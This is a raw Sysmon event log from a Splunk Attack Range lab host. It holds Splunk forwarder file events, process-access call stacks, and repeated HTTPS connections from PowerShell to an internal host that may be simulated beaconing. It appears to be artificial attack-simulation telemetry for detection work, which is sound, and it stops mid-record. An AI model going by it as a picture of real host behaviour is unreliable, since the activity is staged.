SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=447F31D16E2C6CD5BD9ABD331FC92DAF,SHA256=F38CBB9608912BC1FB46AFC0584668F48E982A71F7493DA4919F8D206DE695B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:44.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CBC413D825556815BF4C0F0D95CAC8D,SHA256=F6DBB276CB1B9B0AC5C8A3CB1E58052642DA92DA19B118D3D51D6FF0203A7B8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:45.544{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B00FA005ED86EE16F37E14D4B050F6C,SHA256=109BBA9FFF1E07D0E6D8B6DD241EC52B21B0E2BEEFD1D3A25080727A01EBBEAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:10.052{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52646-false10.0.1.12-8000- 23542300x800000000000000035344178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:46.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=68ECB12AAFBC1ADD97829124A53A7D54,SHA256=76AE729D65174FD230DCB0C7C831FBC29AB0E14B6C5BBAD8F0A73AA8C63EF897,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:46.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4EBF0E8E42C1D18859B8302E7539168,SHA256=AB54162A1E2B8D5E112C3C556F24B0CDA3F290BD3DEBE0DB9C8B3C98AD00AF6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:47.589{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEAD2DD4C6BFF120684CDAF056663579,SHA256=5973D8022BD932695EF7DA88F76482119FB6028659F99D2EC297ABEAE8D4AEA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.752{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52647-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:48.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B13E2B86C8B0A9A1C40BE4DC594CC94D,SHA256=ECAA21C9F4AEF56CF942DF7498CE852F15459BEAF66B93529932455A8B549027,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:49.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF165ECAB00D459E480A7897C3FE4F85,SHA256=B8910D291014C38B8DE07A68011902910DB05BB179EDCF9881CB957F70F94605,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:50.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED4EEE4497A6A6979F2CE5CFA0750643,SHA256=E96C98CDB217811DB83B9543007C123D83F7D470AC7D9BA9BBB55A4BC2827CF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:51.701{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B901B51F1C1193AE4BA1E81F6694C9D,SHA256=F4EF85298972C987E887AD207B420DF555606CB4D90A98B3E3E990313E2E795D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:51.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F68F1CB8CCC09D4E2DAD7FA1BD318529,SHA256=B631C8C2BE9CC4E791B6D207D3BD2ADC7361E370689E14DEAD71CB5E18D4DD5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:15.181{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52648-false10.0.1.12-8000- 23542300x800000000000000035344188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:52.717{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52753D67BF8CFFC151EBF83825475A6,SHA256=9A876FCE6AAFB4EDEE37152EA46DA87704301F482DFE167049C65D6B9581F45B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.763{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52649-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:53.736{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15C684EA1131C77F53D66880919B99A1,SHA256=7D840C1E21F261A7A813DEA8D113B4F9DF37D5CFE9B4B95BE3576607C3ABEC24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:54.751{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62063A08CF821CA96B568A979CB42CCB,SHA256=B1589D08EF2473622BF8A03910F07A613EEE6C7FF4658F541BA8CF3820691D5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:55.796{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13B1413B52888914E44F5FE732AD0A93,SHA256=700822494EF253E52E7F3F4516ABC0463464B1B8357AC837BCCF31A750CB0BCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:55.781{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=084DCAAA19264DD6848F3B78F35AD412,SHA256=E74BC9B07E4C79C6173379870454983C36698E14C50CC700C25B665905AB0983,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:20.207{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52650-false10.0.1.12-8000- 23542300x800000000000000035344194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:56.813{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=218C6B614CB035EF9ADDD36E6C9027B7,SHA256=E645DCAB2C54E006FEFE3812968CD10CE1224CE8EC4CB2FBEF273E381A4A5ECE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:57.848{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04E74CC7B84CD04B9950786A103E8465,SHA256=4036811AB33172B2042BA944F4089B53FDBCF875A53662B225CC39566CDC52D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:21.783{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52651-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:58.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F89BFACCF962E038228CBF053FA89E,SHA256=E2E9B615A25022D58E87ADE4431688B79124562162F4B2B6980135CCED2E10A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:59.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF96E7BECD655DAC73427750752921E4,SHA256=67D257EF41F8C836064EB6F89FF992904773A65B04888CDA60D0A223B9B31567,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:00.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33BF3A6E05A4ED05B22ECF40EBCF781A,SHA256=491C9F9980603BDEB22742500CD9CC2CDD8EFB70BA459D519F68EEA80A50C6ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:01.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98C971DC1EF24280DBC7135E0081AB59,SHA256=5626749850C77037F8C2FE66E1A0A6D1C20CEC8E1CC92E7730C8FCC4E74D1978,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:01.878{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=57947B2571867BAC05F4D955E3B176B9,SHA256=FC8BE449349C1C93BCB2C0CBFC763B2E107E81576139F738415764B9DD96DC27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:26.119{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52652-false10.0.1.12-8000- 23542300x800000000000000035344204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:02.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6031EA2AA8730EF19F333C3B40194DFF,SHA256=159748B57DCAA2BEB78266095C2B6700721104107D61DAF32DDFF748B5E1FA52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:27.803{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52653-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:03.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ACA46A7690167682C21A0187C330F8F,SHA256=20C1CDBAD98D8F02B4CB734981BCD7D289B16FD12B24CEEEAC8B0F8256EF141B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.944{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B680BB47CEDAD5EDB34FF304B03D9254,SHA256=0C125731E642CADEE579DB222FF42495D8447C845729896F04F6D879918F137C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.775{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7510-613B-7AB4-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.775{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.775{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.775{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.775{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.775{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7510-613B-7AB4-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.775{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7510-613B-7AB4-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.760{B81B27B7-7510-613B-7AB4-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035344214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.229{B81B27B7-7510-613B-79B4-03000000C801}64602832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.076{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7510-613B-79B4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 